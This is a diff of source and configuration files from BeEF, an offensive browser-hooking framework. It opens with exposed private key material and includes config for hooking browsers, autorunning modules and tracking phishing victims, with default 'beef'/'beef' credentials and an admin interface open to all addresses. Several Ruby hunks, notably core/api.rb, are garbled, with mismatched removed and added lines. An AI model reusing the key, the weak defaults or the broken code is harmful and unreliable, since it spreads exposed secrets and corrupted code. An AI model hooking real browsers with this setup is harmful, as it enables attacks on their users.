+CjJGYUk56llLwJK043iYGspQUjivMAFb0Xuei/n6T4YrXWS688XIBAIazzZGkZew
-0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3
+Q/aS2yKaxa8jyOe3sH4NeW2rF5Zq9cFNg5OwOHJHFdw08aB6c5pu3JrVewB5xOzg
-HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6
+k86xXgv+GdNLvRfwE05wxEVE1vdbkLTDe+eJ31DqOENELqCGl5VaCeXKapXRjq/W
-4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI
+ltZlGzvWwpAX9XlN3nMDymv2vfRgUANZuRvfe+JxTkGRnw9B5TKCq2oo6GeL2Lxi
-5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS
+DWi2ReapayajmxX8aAoe+TE6hAGXO/eGEzJgScqOE+56kqX9VbXvNEV0wJBlu+1b
-26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo
+39YFfgDC0o0DFiJFE7mO8NTWlfSd9fDzpk9+RuQ90klipmqqw5JI5VKkKSgsm/+j
-yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI
+BpjXRfCBISXysD7e3Tf/0HqzT1DSjbzTNe78IyJIE1IQmUlI11kCAwEAAQKCAYA6
-rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn
+mX87BMcU9eilcZeEspLKsPaPAR83/oqi7QWKe6VKz750UvjLFedJWnaJfhwtl0vs
-AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc
+EOt8N/UOA/UeGCreVdV7nS6rox0gvfBKQMdRXUv51ON7K2BCUiJ1LE2zhuE/Ae6E
-QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU
+ZBYxgPShg6J1HVBBO+xIJMwqIT3WBjx2JtrYNj81sntWd7+LFIRstnQ9cmMbUEc+
-WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88
+1D/l6zzZ/kG6kKQUrJH8iWFzkzY1GGM7HWCbrw3+J/60xCRyXMn6y6mQO91nv0nJ
-yBgay+U9QuoEO425
+heir6gmTIdjM7E6wDCsdLOiziKAZlWI3RkEm+Jag0JEYqlzk1XWaiqHav2Oa8eCU
 Cbo8yst+PpxJoa1I7rSYZkt+7m+hdhVCWwvFCSRnAyVowpDrjL4SBazn61wvOWVs
 jeLrHtP8HlGGHdcpLDGVPsp3mXIjgDPcx+22E+Qk7wWnedi22ZSxQMxwQDt/LMiB
 JtAalaZfYmc5+QowCZfTlpO93wvJYalqobFag3YzAv0879VsKtrnjiutcL0BJgEC
 gcEA4nrqVAumNscnIs7keONkvpTHWABRXX864nLKC+hoyACbDdlakPlo6qxULovE
 CjGhTBG819D6q+VBvwE2uXlKoxh+guilUO0j2M3uj/8OjQDH1ICO2CYyNKuduHly
 Tdn5PIADhpGRM3TXTCpg0P1WS2ql53Qt0HJ1Ae1GU9mz67+lXLbEGVnDUCQ8eOrj
 nCCsbEc50GFlXHgL6w5wjlJ8RUGuOsJJbGtnb2Ed5UofXS1zuldvlGqUVcB/L8Ve
 1O05AoHBAM2ZSS7/G96i0kPuBWo1CZbnzVoR9/ilsLCZ/2hmdsvZiFbK9Fx5Fb1u
 4LAZsPznMya2mmVgK3Y5CzuNT86IHGMdPJ2bJ2n2Pz1QdRRVEFTNpaS4kY/IG2hS
 6pOVxPS+lahC012WhyzRYmSW0MIaJ6XvjpGntIXd+LYYQnb6sSeKVhVgsILxf8Hk
 TMXiR/GCbpSIWrhPD4BHLcqKhja32dL9YAuzi9xAQ4Ccavz1AqCZJat3rR13Vce6
 jB+arptbIQKBwEHG5SvHvlyGds1bPWwGzwmy+DqMzRTUkOuX3yqaM2RzGJVrHSyh
 42DU8BYcrbEwPOJ0/F3J6iPmj7PDzHsNySmZQZUPsIPSe+jJ1pGnyDgXk/IZ7GLG
 pSo69bHQQ+xsdECoBV4eBQfm1WjfngLUsS1yKgEQ8wVpWKZYnWZZAjJkFMjapBWg
 xmMOQynzPmvn6WwBO79Tqjay/vMj3HjZaBJNQyb5qo18nCvzDtW7M2TCgKwMHPIE
 ClTldYsQTbyVsQKBwQC0fgNPbMpMs2ggFo9OY+1dO3Z9whSNhvgMscUVJA7aeshE
 WbwYinxZZ0N9lbBY9adkLx5wLPM6wG1qBG6xg7BYGsyiGBmL3pA6Ba4jAWJq8Hag
 mx++uA/HkDM7CVp0+fNsWe4w1Psqj07vu67dGBUCicIBgNbsRqgXREjlJsPrUHiu
 H8oVymk8EG6Nsk8yaC0n3GS4NUAIf3RlwSJ+WvyxS5rL6v23h/s6pxcNpxJ9ZrU5
 SMEDg0YdJ1noTOVIocECgcEAhMQBUdV0qHrrGyCpsnoRVFaUMi+/+TNjJnStlerj
 KjphQa+J+pvuwzAyu82zFX+6BPsnq9ZvYIBChb6WxjVu+ucIr4A79WrZ7ZpChi00
 64+mU6woATLOcxLIKNSakFOEjubnLoU/orp1CoWUW1tHv7FPO6PaJNi8wuYE3NEv
 j8U27RLwdnqJKUPJ9Tjc7LQd1Hk9UT9BK6EVfxSpy0ybquhJstJX9oa7jihHxcqE
 jyItP2FJBbw7BlIq7t2c2G66
 -----END PRIVATE KEY-----
--- a/config.yaml
+++ b/config.yaml
@@ -1,12 +1,12 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 beef:
-    version: '0.4.5.0-alpha'
+    version: '0.4.7.1-alpha'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
@@ -14,6 +14,12 @@ beef:
    # Used for generating secure tokens
    crypto_default_value_length: 80
    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin interface
    credentials:
        user:   "beef"
        passwd: "beef"
    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
@@ -21,6 +27,8 @@ beef:
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
        # slow API calls to 1 every  api_attempt_delay  seconds
        api_attempt_delay: "0.05"
    # HTTP server
    http:
@@ -33,25 +41,22 @@ beef:
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        #  when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
-        xhr_poll_timeout: 5000
+        xhr_poll_timeout: 1000
        # Host Name / Domain Name
        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
        #   set the public hostname below:
        #public: ""      # public hostname/IP address
        # Reverse Proxy / NAT
-        # If BeEF is running behind a reverse proxy or NAT
+        # If you want BeEF to be accessible behind a reverse proxy or NAT,
-        #  set the public hostname and port here
+        #   set both the publicly accessible hostname/IP address and port below:
        #public: ""      # public hostname/IP address
-        #public_port: "" # experimental
+        #public_port: "" # public port (experimental)
        # DNS
        dns_host: "localhost"
        dns_port: 53
        # Web Admin user interface URI
        web_ui_basepath: "/ui"
        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
@@ -68,17 +73,19 @@ beef:
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 1000 # poll BeEF every second
            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
-
+            hook_404: false # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
+            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
@@ -100,50 +107,63 @@ beef:
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
-        db_port: 5432
+        db_port: 3306
        db_name: "beef"
        db_user: "beef"
-        db_passwd: "beef123"
+        db_passwd: "beef"
        db_encoding: "UTF-8"
-    # Credentials to authenticate in BeEF.
+    # Autorun Rule Engine
    # Used by both the RESTful API and the Admin_UI extension
    credentials:
        user:   "beef"
        passwd: "beef"
    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
-        enable: true
+        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
-        # set this to TRUE if you want to allow auto-run execution for modules with target->user_notify
+        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
-        allow_user_notify: true
+        # continue execution regardless of results.
        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
        result_poll_interval: 300
        result_poll_timeout: 5000
        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
        continue_after_timeout: true
    # Enables DNS lookups on zombie IP addresses
    dns_hostname_lookup: false
    # IP Geolocation
-    # NOTE: requires MaxMind database:
+    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
    #   curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
    #   gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
    geoip:
-        enable: false
+        enable: true
-        database: '/opt/GeoIP/GeoLiteCity.dat'
+        database: '/opt/GeoIP/GeoLite2-City.mmdb'
    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
    integration:
        phishing_frenzy:
            enable: false
    # You may override default extension configuration parameters here
    # Note: additional experimental extensions are available in the 'extensions' directory
    #       and can be enabled via their respective 'config.yaml' file
    extension:
        admin_ui:
            enable: true
            base_path: "/ui"
        demos:
            enable: true
        events:
            enable: true
        evasion:
            enable: false
        requester:
            enable: true
        proxy:
            enable: true
        network:
            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
-        evasion:
+        xssrays:
            enable: false
        console:
             shell:
                enable: false
        ipec:
            enable: true
        # this is still experimental, we're working on it..
        dns:
            enable: false
--- a/core/api.rb
+++ b/core/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,168 +7,205 @@
 module BeEF
  module API
    #
    # Registrar class to handle all registered timed API calls
    #
    class Registrar
      include Singleton
      #
      # Create registrar
      #
      def initialize
        @registry = []
        @count = 1
      end
      # Register timed API calls to an owner
      #
      # @param [Class] owner the owner of the API hook
      # @param [Class] c the API class the owner would like to hook into
      # @param [String] method the method of the class the owner would like to execute
      # @param [Array] params an array of parameters that need to be matched before the owner will be called
      #
      def register(owner, c, method, params = [])
-        if self.verify_api_path(c, method)
+        unless verify_api_path(c, method)
-          if not self.registered?(owner, c, method, params)
+          print_error "API Registrar: Attempted to register non-existant API method #{c} :#{method}"
-            id = @count
+          return
            @registry << {
                'id' => id,
                'owner' => owner,
                'class' => c,
                'method' => method,
                'params' => params
            }
            @count += 1
            return id
          else
            print_debug "API Registrar: Attempting to re-register API call #{c.to_s} :#{method.to_s}"
          end
        else
          print_error "API Registrar: Attempted to register non-existant API method #{c.to_s} :#{method.to_s}"
        end
        if registered?(owner, c, method, params)
          print_debug "API Registrar: Attempting to re-register API call #{c} :#{method}"
          return
        end
        id = @count
        @registry << {
          'id'     => id,
          'owner'  => owner,
          'class'  => c,
          'method' => method,
          'params' => params
        }
        @count += 1
        id
      end
      #
      # Tests whether the owner is registered for an API hook
      #
      # @param [Class] owner the owner of the API hook
      # @param [Class] c the API class
      # @param [String] method the method of the class
      # @param [Array] params an array of parameters that need to be matched
      #
      # @return [Boolean] whether or not the owner is registered
      #
      def registered?(owner, c, method, params = [])
-        @registry.each{|r|
+        @registry.each do |r|
-          if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
+          next unless r['owner'] == owner
-            return true
+          next unless r['class'] == c
-          end
+          next unless r['method'] == method
-        }
+          next unless is_matched_params? r, params
-        return false
+          return true
        end
        false
      end
      #
      # Match a timed API call to determine if an API.fire() is required
      #
      # @param [Class] c the target API class
      # @param [String] method the method of the target API class
      # @param [Array] params an array of parameters that need to be matched
      #
      # @return [Boolean] whether or not the arguments match an entry in the API registry
      #
      def matched?(c, method, params = [])
-        @registry.each{|r|
+        @registry.each do |r|
-          if r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
+          next unless r['class'] == c
-            return true
+          next unless r['method'] == method
-          end
+          next unless is_matched_params? r, params
-        }
+          return true
-        return false
+        end
        false
      end
      #
      # Un-registers an API hook
      #
      # @param [Integer] id the ID of the API hook
      #
      def unregister(id)
-        @registry.delete_if{|r|
+        @registry.delete_if {|r| r['id'] == id }
          r['id'] == id
        }
      end
      #
      # Retrieves all the owners and ID's of an API hook
      # @param [Class] c the target API class
      # @param [String] method the method of the target API class
      # @param [Array] params an array of parameters that need to be matched
      #
      # @return [Array] an array of hashes consisting of two keys :owner and :id
      #
      def get_owners(c, method, params = [])
        owners = []
-        @registry.each{|r|
+        @registry.each do |r|
-          if r['class'] == c and r['method'] == method
+          next unless r['class'] == c
-            if self.is_matched_params?(r, params)
+          next unless r['method'] == method
-              owners << { :owner => r['owner'], :id => r['id']}
+          next unless is_matched_params? r, params
-            end
+          owners << { :owner => r['owner'], :id => r['id'] }
-          end
+        end
-        }
+        owners
        return owners
      end
      #
      # Verifies that the api_path has been regitered
      # Verifies the API path has been registered.
      #
      # @note This is a security precaution
      #
      # @param [Class] c the target API class to verify
      # @param [String] m the target method to verify
      #
      def verify_api_path(c, m)
-        return (c.const_defined?('API_PATHS') and c.const_get('API_PATHS').has_key?(m))
+        (c.const_defined?('API_PATHS') && c.const_get('API_PATHS').key?(m))
      end
      #
      # Retrieves the registered symbol reference for an API hook
      #
      # @param [Class] c the target API class to verify
      # @param [String] m the target method to verify
      #
      # @return [Symbol] the API path
      #
      def get_api_path(c, m)
-        return (self.verify_api_path(c, m)) ? c.const_get('API_PATHS')[m] : nil;
+        verify_api_path(c, m) ? c.const_get('API_PATHS')[m] : nil
      end
      #
      # Matches stored API params to params
      #
      # @note If a stored API parameter has a NilClass the parameter matching is skipped for that parameter
      # @note By default this method returns true, this is either because the API.fire() did not include any parameters or there were no parameters defined for this registry entry
      #
      # @param [Hash] reg hash of registry element, must contain 'params' key
      # @param [Array] params array of parameters to be compared to the stored parameters
      #
      # @return [Boolean] whether params matches the stored API parameters
      #
      def is_matched_params?(reg, params)
        stored = reg['params']
-        if stored.length == params.length
+        return true unless stored.length == params.length
-          matched = true
+
-          stored.each_index{|i|
+        stored.each_index do |i|
-            next if stored[i] == nil
+          next if stored[i].nil?
-            if not stored[i] == params[i]
+          return false unless stored[i] == params[i]
              matched = false
            end
          }
          return false if not matched
        end
-        return true
+
        true
      end
      #
      # Fires all owners registered to this API hook
      #
      # @param [Class] c the target API class
      # @param [String] m the target API method
      # @param [Array] *args parameters passed for the API call
-      # @return [Hash, NilClass] returns either a Hash of :api_id and :data if the owners return data, otherwise NilClass
+      #
      # @return [Hash, NilClass] returns either a Hash of :api_id and :data
      #         if the owners return data, otherwise NilClass
      #
      def fire(c, m, *args)
-        mods = self.get_owners(c, m, args)
+        mods = get_owners(c, m, args)
-        if mods.length > 0
+        return nil unless mods.length.positive?
-          data = []
+
-          if self.verify_api_path(c, m) and c.ancestors[0].to_s > "BeEF::API"
+        unless verify_api_path(c, m) && c.ancestors[0].to_s > 'BeEF::API'
-            method = self.get_api_path(c, m)
+          print_error "API Path not defined for Class: #{c} method:#{method}"
-            mods.each do |mod|
+          return []
              begin
                #Only used for API Development (very verbose)
                #print_info "API: #{mod} fired #{method}"
                result = mod[:owner].method(method).call(*args)
                if not result == nil
                  data << {:api_id => mod[:id], :data => result}
                end
              rescue => e
                print_error "API Fire Error: #{e.message} in #{mod.to_s}.#{method.to_s}()"
              end
            end
          else
            print_error "API Path not defined for Class: #{c.to_s} method:#{method.to_s}"
          end
          return data
        end
-        return nil
+
        data = []
        method = get_api_path(c, m)
        mods.each do |mod|
          begin
            # Only used for API Development (very verbose)
            # print_info "API: #{mod} fired #{method}"
            result = mod[:owner].method(method).call(*args)
            unless result.nil?
              data << { :api_id => mod[:id], :data => result }
            end
          rescue => e
            print_error "API Fire Error: #{e.message} in #{mod}.#{method}()"
          end
        end
        data
      end
    end
  end
 end
--- a/core/api/extension.rb
+++ b/core/api/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/extensions.rb
+++ b/core/api/extensions.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/configuration.rb
+++ b/core/api/main/configuration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/migration.rb
+++ b/core/api/main/migration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/network_stack/assethandler.rb
+++ b/core/api/main/network_stack/assethandler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/server.rb
+++ b/core/api/main/server.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/server/hook.rb
+++ b/core/api/main/server/hook.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/module.rb
+++ b/core/api/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/modules.rb
+++ b/core/api/modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -29,8 +29,12 @@ require 'core/main/network_stack/handlers/raw'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
-# @note Include the distributed engine
+# @note Include the autorun engine
-require 'core/main/distributed_engine/models/rules'
+require 'core/main/autorun_engine/models/rule'
 require 'core/main/autorun_engine/models/execution'
 require 'core/main/autorun_engine/parser'
 require 'core/main/autorun_engine/engine'
 require 'core/main/autorun_engine/rule_loader'
 ## @note Include helpers
 require 'core/module'
@@ -41,11 +45,13 @@ require 'core/hbmanager'
 ## @note Include RESTful API
 require 'core/main/rest/handlers/hookedbrowsers'
 require 'core/main/rest/handlers/browserdetails'
 require 'core/main/rest/handlers/modules'
 require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
 require 'core/main/rest/handlers/server'
 require 'core/main/rest/handlers/autorun_engine'
 require 'core/main/rest/api'
 ## @note Include Websocket
--- a/core/core.rb
+++ b/core/core.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,7 +10,6 @@ end
 end
 # @note Includes database models - the order must be consistent otherwise DataMapper goes crazy
 require 'core/main/models/user'
 require 'core/main/models/commandmodule'
 require 'core/main/models/hookedbrowser'
 require 'core/main/models/log'
@@ -22,7 +21,6 @@ require 'core/main/models/browserdetails'
 # @note Include the constants
 require 'core/main/constants/browsers'
 require 'core/main/constants/commandmodule'
 require 'core/main/constants/distributedengine'
 require 'core/main/constants/os'
 require 'core/main/constants/hardware'
@@ -32,12 +30,9 @@ require 'core/main/command'
 require 'core/main/crypto'
 require 'core/main/logger'
 require 'core/main/migration'
 require 'core/main/geoip'
 # @note Include the command line parser and the banner printer
 require 'core/main/console/commandline'
 require 'core/main/console/banners'
 # @note Include rubyzip lib
 require 'zip'
--- a/core/extension.rb
+++ b/core/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,36 +10,40 @@ module BeEF
    # @param [String] ext the extension key
    # @return [Boolean] whether or not the extension exists in BeEF's configuration
    def self.is_present(ext)
-      return BeEF::Core::Configuration.instance.get('beef.extension').has_key?(ext.to_s)
+      BeEF::Core::Configuration.instance.get('beef.extension').key? ext.to_s
    end
    # Checks to see if extension is enabled in configuration
    # @param [String] ext the extension key
    # @return [Boolean] whether or not the extension is enabled 
    def self.is_enabled(ext)
-      return (self.is_present(ext) and BeEF::Core::Configuration.instance.get('beef.extension.'+ext.to_s+'.enable') == true)
+      return false unless is_present(ext)
      BeEF::Core::Configuration.instance.get("beef.extension.#{ext}.enable") == true
    end
    # Checks to see if extension has been loaded
    # @param [String] ext the extension key
-    # @return [Boolean] whether or not the extension is loaded 
+    # @return [Boolean] whether or not the extension is loaded
    def self.is_loaded(ext)
-      return (self.is_enabled(ext) and BeEF::Core::Configuration.instance.get('beef.extension.'+ext.to_s+'.loaded') == true)
+      return false unless is_enabled(ext)
      BeEF::Core::Configuration.instance.get("beef.extension.#{ext}.loaded") == true
    end
    # Loads an extension 
    # @param [String] ext the extension key
    # @return [Boolean] whether or not the extension loaded successfully
    # @todo Wrap the require() statement in a try catch block to allow BeEF to fail gracefully if there is a problem with that extension - Issue #480
    def self.load(ext)
-      if File.exists?('extensions/'+ext+'/extension.rb')
+      if File.exist? "#{$root_dir}/extensions/#{ext}/extension.rb"
-        require 'extensions/'+ext+'/extension.rb'
+        require "#{$root_dir}/extensions/#{ext}/extension.rb"
        print_debug "Loaded extension: '#{ext}'"
-        BeEF::Core::Configuration.instance.set('beef.extension.'+ext+'.loaded', true)
+        BeEF::Core::Configuration.instance.set "beef.extension.#{ext}.loaded", true
        return true
      end
      print_error "Unable to load extension '#{ext}'"
-      return false
+      false
    rescue => e
      print_error "Unable to load extension '#{ext}':"
      print_more e.message
    end
  end
 end
--- a/core/extensions.rb
+++ b/core/extensions.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -9,13 +9,13 @@ module BeEF
    # Returns configuration of all enabled extensions
    # @return [Array] an array of extension configuration hashes that are enabled
    def self.get_enabled
-      return BeEF::Core::Configuration.instance.get('beef.extension').select { |k,v| v['enable'] == true }
+      BeEF::Core::Configuration.instance.get('beef.extension').select { |k,v| v['enable'] == true }
    end
    # Returns configuration of all loaded extensions
    # @return [Array] an array of extension configuration hashes that are loaded
    def self.get_loaded
-      return BeEF::Core::Configuration.instance.get('beef.extension').select {|k,v| v['loaded'] == true }
+      BeEF::Core::Configuration.instance.get('beef.extension').select {|k,v| v['loaded'] == true }
    end
    # Load all enabled extensions
@@ -23,12 +23,10 @@ module BeEF
    def self.load
      BeEF::Core::Configuration.instance.load_extensions_config
      self.get_enabled.each { |k,v|
-        BeEF::Extension.load(k)
+        BeEF::Extension.load k
      }
      # API post extension load
-      BeEF::API::Registrar.instance.fire(BeEF::API::Extensions, 'post_load')
+      BeEF::API::Registrar.instance.fire BeEF::API::Extensions, 'post_load'
    end
  end
 end
--- a/core/filters.rb
+++ b/core/filters.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/filters/base.rb
+++ b/core/filters/base.rb
@@ -1,143 +1,199 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
-  
+
  # Check if the string is not empty and not nil
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] Whether the string is not empty
+  #   @return [Boolean] Whether the string is not empty
  def self.is_non_empty_string?(str)
    return false if str.nil?
-    return false if not str.is_a? String
+    return false unless str.is_a? String
    return false if str.empty?
    true
  end
  # Check if only the characters in 'chars' are in 'str'
-  # @param [String] chars List of characters to match
+  #   @param [String] chars List of characters to match
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] Whether or not the only characters in str are specified in chars
+  #   @return [Boolean] Whether or not the only characters in str are specified in chars
  def self.only?(chars, str)
    regex = Regexp.new('[^' + chars + ']')
-    regex.match(str).nil?
+    regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
  end
-        
+
  # Check if one or more characters in 'chars' are in 'str'
-  # @param [String] chars List of characters to match
+  #   @param [String] chars List of characters to match
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] Whether one of the characters exists in the string
+  #   @return [Boolean] Whether one of the characters exists in the string
  def self.exists?(chars, str)
    regex = Regexp.new(chars)
-    not regex.match(str).nil?
+    not regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
  end
-        
+
  # Check for null char
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] If the string has a null character
+  #   @return [Boolean] If the string has a null character
  def self.has_null? (str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    exists?('\x00', str)
  end
  # Check for non-printable char
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] Whether or not the string has non-printable characters
+  #   @return [Boolean] Whether or not the string has non-printable characters
  def self.has_non_printable_char?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    not only?('[:print:]', str)
  end
  # Check if num characters only
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] If the string only contains numbers
+  #   @return [Boolean] If the string only contains numbers
  def self.nums_only?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    only?('0-9', str)
  end
  # Check if valid float
-  # @param [String] str String for float testing
+  #   @param [String] str String for float testing
-  # @return [Boolean] If the string is a valid float
+  #   @return [Boolean] If the string is a valid float
  def self.is_valid_float?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
-    return false if not only?('0-9\.', str)
